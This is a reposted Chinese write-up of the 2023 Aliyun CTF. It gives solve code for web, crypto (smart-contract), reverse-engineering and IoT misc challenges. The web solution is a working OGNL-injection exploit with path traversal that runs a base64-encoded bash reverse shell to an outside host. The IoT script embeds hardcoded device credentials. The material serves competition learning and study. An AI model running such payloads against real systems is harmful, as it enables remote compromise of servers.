2023阿里云CTF writeup by Mini-Venom
2023-4-26 11:25:38 Author: ChaMd5安全团队(查看原文) 阅读量:10 收藏

招新小广告CTF组诚招re、crypto、pwn、misc、合约方向的师傅,长期招新IOT+Car+工控+样本分析多个组招人有意向的师傅请联系邮箱

[email protected](带上简历和想加入的小组)

Web:

The path to shell

import requests as req
from urllib.parse import quote
import base64

url = "http://120.55.13.151:8080/app/user/%s"
headers = {
    "Accept""application/json, text/plain, */*",
    "Referer""http://120.55.13.151:8080/app/",
    "Connection""close"}

payload = '(#r="a".getClass().forName("java.lang.Runtime")).(#m=#r.getDeclaredMethods().{^ #this.name.equals("getRuntime")}[0]).(#o=#m.invoke(null,null)).(#e=#r.getDeclaredMethods().{? #this.name.equals("exec")}.{? #this.getParameters()[0].getType().getName().equals("[Ljava.lang.String;")}.{? #this.getParameters().length == 1}[0]).(#e.invoke(#o,new String[]{"sh","-c","echo %s |base64 -d|bash"}))' % base64.b64encode(b"bash -i >& /dev/tcp/vps/8099 0>&1")
payload = "../../action/%s" % quote(quote(payload))
resp = req.get(url % payload.replace("/","%252F"), headers=headers)

Crypto

HappyTree

contract exp {
    address public greeter;
    constructor(address _greeter) public {
        greeter = _greeter;
    }

    function go(public {
        bytes32[] memory leafs;
        leafs = new bytes32[](4);

        leafs[0] = bytes32(0x81376b9868b292a46a1c486d344e427a3088657fda629b5f4a647822d329cd6a);
        leafs[1] = bytes32(0x28cac318a86c8a0a6a9156c2dba2c8c2363677ba0514ef616592d81557e679b6);
        leafs[2] = bytes32(0x804cd8981ad63027eb1d4a7e3ac449d0685f3660d6d8b1288eb12d345ca2331d);
        leafs[3] = bytes32(0x9b1a0a45cfdc60f45820808958c1895d44da61c8f804f5560020a373b23ad51e);
        // leafs[4] = bytes32(0x4a35f5bda2916fbfac6936f63313cee16979995b2409de59ceda0377bae8c486);

        bytes32[][] memory proofs;

        proofs = new bytes32[][](4);

        proofs[0] = new bytes32[](2);
        proofs[0][0] = bytes32(0x28cac318a86c8a0a6a9156c2dba2c8c2363677ba0514ef616592d81557e679b6);
        proofs[0][1] = bytes32(0x4a35f5bda2916fbfac6936f63313cee16979995b2409de59ceda0377bae8c486);

        proofs[1] = new bytes32[](2);
        proofs[1][0] = bytes32(0x81376b9868b292a46a1c486d344e427a3088657fda629b5f4a647822d329cd6a);
        proofs[1][1] = bytes32(0x4a35f5bda2916fbfac6936f63313cee16979995b2409de59ceda0377bae8c486);

        proofs[2] = new bytes32[](2);
        proofs[2][0] = bytes32(0x804cd8981ad63027eb1d4a7e3ac449d0685f3660d6d8b1288eb12d345ca2331d);
        proofs[2][1] = bytes32(0x9b1a0a45cfdc60f45820808958c1895d44da61c8f804f5560020a373b23ad51e);

        proofs[3] = new bytes32[](1);
        proofs[3][0] = bytes32(0x4a35f5bda2916fbfac6936f63313cee16979995b2409de59ceda0377bae8c486);

        // proofs[4] = new bytes32[](1);
        // proofs[4][0] = bytes32(0x9b1a0a45cfdc60f45820808958c1895d44da61c8f804f5560020a373b23ad51e);

        uint256[] memory index;
        index = new uint256[](4);
        for (uint256 i=0;i<3;i++) {
            index[i] = i;
        }

        index[3] = 0;
        // index[4] = 1;

        Greeter(greeter).b(leafs, proofs, index);
    }
}

Reverse:

字节码跳动

#include <stdio.h>
#include <stdint.h>

uint8_t enc[] = {
    0x3e, 0xdd, 0x79, 0x25, 0xcd, 0x6e, 0x04, 0xab,
    0x44, 0xf2, 0x5b, 0xef, 0x57, 0xbc, 0x53, 0xbd,
    0x20, 0xb7, 0x4b, 0x8c, 0x11, 0xf8, 0x93, 0x09,
    0x0f, 0xdc, 0xdf, 0xdd, 0xad, 0x07, 0x09, 0x10,
    0x01, 0x00, 0xfe, 0x6a, 0x92, 0x30, 0x33, 0x32,
    0x34, 0xfb, 0xae
};

void decrypt(uint8_t *enc, uint8_t *flag, int len) {
    // Initialize variables
    uint8_t r0 = enc[18];
    uint8_t r1 = 159;

    // Decrypt byte sequence
    for (int i = len - 1; i >= 0; i--) {
        if (i > 0 && i < 19) {
            flag[i] = (enc[i] - enc[i - 1] - 51) % 256;
        } else if (i == 0) {
            flag[i] = (enc[i] - 170 - 51) % 256;
        } else {
            r1 ^= enc[i];
            flag[i] = (enc[i] - r1) % 256;
        }
    }
}

int main() {
    uint8_t flag[43] = {0};
    decrypt(enc, flag, 43);
    for (int i = 0; i < 43; i++) {
        printf("%c ", flag[i]);
    }
    printf("\n");
    return 0;
}

Misc

消失的声波

#pip3 install aliyun-iot-linkkit 
import sys
from linkkit import linkkit
import threading
import traceback
import inspect
import time
import logging

# config log
__log_format = '%(asctime)s-%(process)d-%(thread)d - %(name)s:%(module)s:%(funcName)s - %(levelname)s - %(message)s'
logging.basicConfig(format=__log_format)

lk = linkkit.LinkKit(
    host_name="cn-shanghai",
    product_key="a1eAwsBKddO",
    device_name="ncApIY2XV9NUIY4VpbGk",
    device_secret="04845e512ead208b2437d970a154d69e")
# lk.config_mqtt(endpoint="iot-cn-6ja******.mqtt.iothub.aliyuncs.com")

lk.enable_logger(logging.DEBUG)

def on_device_dynamic_register(rc, value, userdata):
    if rc == 0:
        print("dynamic register device success, value:" + value)
    else:
        print("dynamic register device fail, message:" + value)

def on_connect(session_flag, rc, userdata):
    print("on_connect:%d,rc:%d" % (session_flag, rc))
    pass

def on_disconnect(rc, userdata):
    print("on_disconnect:rc:%d,userdata:" % rc)

def on_topic_message(topic, payload, qos, userdata):
    print("on_topic_message:" + topic + " payload:" + str(payload) + " qos:" + str(qos))
    pass

def on_subscribe_topic(mid, granted_qos, userdata):
    print("on_subscribe_topic mid:%d, granted_qos:%s" %
          (mid, str(','.join('%s' % it for it in granted_qos))))
    pass

def on_unsubscribe_topic(mid, userdata):
    print("on_unsubscribe_topic mid:%d" % mid)
    pass

def on_publish_topic(mid, userdata):
    print("on_publish_topic mid:%d" % mid)

lk.on_device_dynamic_register = on_device_dynamic_register
lk.on_connect = on_connect
lk.on_disconnect = on_disconnect
lk.on_topic_message = on_topic_message
lk.on_subscribe_topic = on_subscribe_topic
lk.on_unsubscribe_topic = on_unsubscribe_topic
lk.on_publish_topic = on_publish_topic

lk.config_device_info("Eth|03ACDEFF0032|Eth|03ACDEFF0031")
lk.config_mqtt(port=1883, protocol="MQTTv311", transport="TCP",secure="TLS")
lk.connect_async()
lk.start_worker_loop()

while True:
    try:
        msg = input()
    except KeyboardInterrupt:
        sys.exit()
    else:
        if msg == "1":
            lk.disconnect()
        elif msg == "2":
            lk.connect_async()
        elif msg == "3":
            rc, mid = lk.subscribe_topic(lk.to_full_topic("user/get"))
            if rc == 0:
                print("subscribe topic success:%r, mid:%r" % (rc, mid))
            else:
                print("subscribe topic fail:%d" % rc)
        elif msg == "4":
            rc, mid = lk.unsubscribe_topic(lk.to_full_topic("user/get"))
            if rc == 0:
                print("unsubscribe topic success:%r, mid:%r" % (rc, mid))
            else:
                print("unsubscribe topic fail:%d" % rc)
        elif msg == "5":
            rc, mid = lk.publish_topic(lk.to_full_topic("user/update"), "{\"id\":\"1\",\"version\":\"1.0\",\"params\":{\"LightSwitch\":0}}")
            if rc == 0:
                print("publish topic success:%r, mid:%r" % (rc, mid))
            else:
                print("publish topic fail:%d" % rc)
        elif msg == "8":
            ret = lk.dump_user_topics()
            print("user topics:%s", str(ret))
        elif msg == "9":
            lk.destruct()
            print("destructed")
        else:
            sys.exit()

- END -


文章来源: http://mp.weixin.qq.com/s?__biz=MzIzMTc1MjExOQ==&mid=2247508613&idx=1&sn=d00c4d23ff20301ef9f85b22e38129c2&chksm=e89d8a5ddfea034bba7abe8a0cc5b998e517e8edb54177fd537458446773fc464c1129fc34d1#rd
如有侵权请联系:admin#unsafe.sh